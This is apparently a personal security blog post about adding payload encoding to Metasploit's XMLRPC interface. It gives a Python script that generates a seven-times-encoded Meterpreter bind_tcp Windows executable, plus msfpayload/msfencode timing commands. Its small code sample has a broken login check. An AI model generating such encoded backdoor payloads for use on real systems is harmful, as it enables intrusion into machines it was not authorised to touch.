Security Notes, News, and Thoughts

Fun with Metasploit payload generation

Tonight has been fun, I have been learning more about how payloads are generated inside Metasploit. My goal was to figure out how to add the msfencode functionality into the generate_simple function that is used by both XMLRPC and the console so that you can encode payloads and all that fun stuff from within Metasploit. I think I have it working now, and once Metasploit is loaded there seems to be a significant speed difference. Here is what I found:

I wrote a quick xmlrpc test to get an executable payload from Metasploit encoding it 7 times with whatever encoder it thinks is best. The code I'm using hasn't been committed or submitted yet, but if you want to test it I can provide you a patch until I'm happy enough with it to submit it.

import xmlrpclib
import binascii
proxy = xmlrpclib.ServerProxy("http://localhost:55553")

ret = proxy.auth.login("msf","abc123")
if ret['result'] == 'success':
token = ret['token']
print "Could not login\n"

opts = {
"Format" : 'exe',
"Iterations" : 7,
"ForceEncode" : True}

ret = proxy.module.execute(token,"payload","windows/meterpreter/bind_tcp",opts)
if(ret['result'] == 'success'):
print binascii.unhexlify(ret['payload'])

Next.. I decided to do a test of the xmlrpc vs the traditional way of doing it:

root@bt:~/msfmods/py# time (python > /tmp/test3)

real 0m3.839s
user 0m0.020s
sys 0m0.043s
root@bt:~/msfmods/py# time (~/metasploit/msfpayload windows/meterpreter/bind_tcp raw | ~/metasploit/msfencode -t exe -c 5 -o /tmp/test2 2>/dev/null )

real 0m10.548s
user 0m7.553s
sys 0m2.920s
root@bt:~/msfmods/py# file /tmp/test2 /tmp/test3
/tmp/test2: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
/tmp/test3: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit

It definitely appears we have a speed increase, and with the additional overhead of an auth in the way, it's possible to take a little bit more time off of it. Being able to do this over XMLRPC hopefully will give a good way for folks to grab payloads remotely and easily for common tasks.

Have thoughts or suggestions ?

Hit me up at sussurro [aT] happypacket DOT net